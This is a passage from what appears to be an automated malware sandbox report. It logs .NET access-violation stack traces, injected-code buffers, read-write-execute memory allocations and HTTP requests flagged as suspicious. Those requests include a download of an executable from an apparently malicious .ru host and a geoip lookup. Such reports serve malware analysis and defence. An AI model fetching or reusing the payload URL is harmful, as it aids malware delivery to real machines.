exception.symbol: exception.address: 0xb47098 registers.esp: 3009632 registers.edi: 37777566 registers.eax: 0 registers.ebp: 3009684 registers.edx: 81876724 registers.ebx: 37777416 registers.esi: 37777636 registers.ecx: 81877248	1
__exception__ Sept. 14, 2021, 4:14 p.m.	stacktrace: 0xb48a36 0xb48989 0xb462aa 0xb45cb2 0xb45c29 0xb419bf 0xb416b0 0xb40070 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x720a2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x720b264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x720b2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x721674ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72167610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x721f1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x721f1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x721f1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x721f416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x736ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x743c7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x743c4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 40 04 89 45 d4 c7 45 e4 00 00 00 00 c7 45 e8 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xb47098 registers.esp: 3009632 registers.edi: 38741062 registers.eax: 0 registers.ebp: 3009684 registers.edx: 81876724 registers.ebx: 38740912 registers.esi: 38741132 registers.ecx: 81877248	1
__exception__ Sept. 14, 2021, 4:14 p.m.	stacktrace: 0xb48a36 0xb48989 0xb462aa 0xb45cb2 0xb45c29 0xb419bf 0xb416b0 0xb40070 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x720a2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x720b264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x720b2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x721674ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72167610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x721f1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x721f1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x721f1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x721f416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x736ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x743c7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x743c4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 40 04 89 45 d4 c7 45 e4 00 00 00 00 c7 45 e8 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xb47098 registers.esp: 3009632 registers.edi: 37797474 registers.eax: 0 registers.ebp: 3009684 registers.edx: 81876724 registers.ebx: 37797324 registers.esi: 37797544 registers.ecx: 81877248	1
__exception__ Sept. 14, 2021, 4:14 p.m.	stacktrace: 0xb48f97 0xb48ee9 0xb4631f 0xb45cb2 0xb45c29 0xb419bf 0xb416b0 0xb40070 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x720a2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x720b264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x720b2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x721674ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72167610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x721f1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x721f1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x721f1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x721f416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x736ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x743c7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x743c4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 40 04 89 45 d4 c7 45 e4 00 00 00 00 c7 45 e8 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xb47098 registers.esp: 3009636 registers.edi: 38761062 registers.eax: 0 registers.ebp: 3009688 registers.edx: 81876724 registers.ebx: 38760912 registers.esi: 38761132 registers.ecx: 81877248	1
__exception__ Sept. 14, 2021, 4:14 p.m.	stacktrace: 0xb48f97 0xb48ee9 0xb4631f 0xb45cb2 0xb45c29 0xb419bf 0xb416b0 0xb40070 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x720a2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x720b264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x720b2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x721674ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72167610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x721f1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x721f1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x721f1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x721f416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x736ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x743c7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x743c4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 40 04 89 45 d4 c7 45 e4 00 00 00 00 c7 45 e8 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xb47098 registers.esp: 3009636 registers.edi: 39777246 registers.eax: 0 registers.ebp: 3009688 registers.edx: 81876724 registers.ebx: 39777096 registers.esi: 39777316 registers.ecx: 81877248	1
__exception__ Sept. 14, 2021, 4:14 p.m.	stacktrace: 0xb48f97 0xb48ee9 0xb4631f 0xb45cb2 0xb45c29 0xb419bf 0xb416b0 0xb40070 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x720a2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x720b264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x720b2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x721674ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72167610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x721f1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x721f1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x721f1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x721f416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x736ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x743c7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x743c4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 40 04 89 45 d4 c7 45 e4 00 00 00 00 c7 45 e8 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xb47098 registers.esp: 3009636 registers.edi: 40793430 registers.eax: 0 registers.ebp: 3009688 registers.edx: 81876724 registers.ebx: 40793280 registers.esi: 40793500 registers.ecx: 81877248	1
__exception__ Sept. 14, 2021, 4:14 p.m.	stacktrace: 0xb493d9 0xb49329 0xb46390 0xb45cb2 0xb45c29 0xb419bf 0xb416b0 0xb40070 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x720a2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x720b264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x720b2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x721674ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72167610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x721f1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x721f1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x721f1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x721f416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x736ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x743c7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x743c4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 40 04 89 45 d4 c7 45 e4 00 00 00 00 c7 45 e8 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xb47098 registers.esp: 3009632 registers.edi: 41809794 registers.eax: 0 registers.ebp: 3009684 registers.edx: 81876724 registers.ebx: 41809644 registers.esi: 41809864 registers.ecx: 81877248	1
__exception__ Sept. 14, 2021, 4:14 p.m.	stacktrace: 0xb493d9 0xb49329 0xb46390 0xb45cb2 0xb45c29 0xb419bf 0xb416b0 0xb40070 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x720a2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x720b264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x720b2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x721674ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72167610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x721f1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x721f1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x721f1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x721f416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x736ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x743c7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x743c4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 40 04 89 45 d4 c7 45 e4 00 00 00 00 c7 45 e8 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xb47098 registers.esp: 3009632 registers.edi: 37840766 registers.eax: 0 registers.ebp: 3009684 registers.edx: 81876724 registers.ebx: 37840616 registers.esi: 37840836 registers.ecx: 81877248	1
__exception__ Sept. 14, 2021, 4:14 p.m.	stacktrace: 0xb493d9 0xb49329 0xb46390 0xb45cb2 0xb45c29 0xb419bf 0xb416b0 0xb40070 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x720a2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x720b264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x720b2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x721674ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72167610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x721f1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x721f1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x721f1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x721f416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x736ef5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x743c7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x743c4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 40 04 89 45 d4 c7 45 e4 00 00 00 00 c7 45 e8 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xb47098 registers.esp: 3009632 registers.edi: 38859070 registers.eax: 0 registers.ebp: 3009684 registers.edx: 81876724 registers.ebx: 38858920 registers.esi: 38859140 registers.ecx: 81877248	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)

suspicious_features	GET method with no useragent header				suspicious_request	GET http://a0575239.xsph.ru/133722.exe
suspicious_features	GET method with no useragent header				suspicious_request	GET https://api.ip.sb/geoip

Performs some HTTP requests (2 events)

request	GET http://a0575239.xsph.ru/133722.exe
request	GET https://api.ip.sb/geoip

Resolves a suspicious Top Level Domain (TLD) (1 event)

domain

a0575239.xsph.ru

description

Russian Federation domain TLD

Allocates read-write-execute memory (usually to unpack itself) (50 out of 992 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 1116 region_size: 1966080 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007e0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00980000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 1116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72741000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 1116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72742000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 1116 region_size: 1966080 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b50000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00cf0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00495000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0049b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00497000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003fc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00740000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0048a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00487000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00486000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003fa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0048b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0076f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00760000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00741000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00742000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 2076 region_size: 851968 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005e0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00670000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 2076 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x720a1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 2076 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x720a2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 2076 region_size: 1835008 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ba0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00d20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00572000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005b5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005bb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005b7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0058c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00596000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0059a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00597000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0057a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0059b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 4:14 p.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0058a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
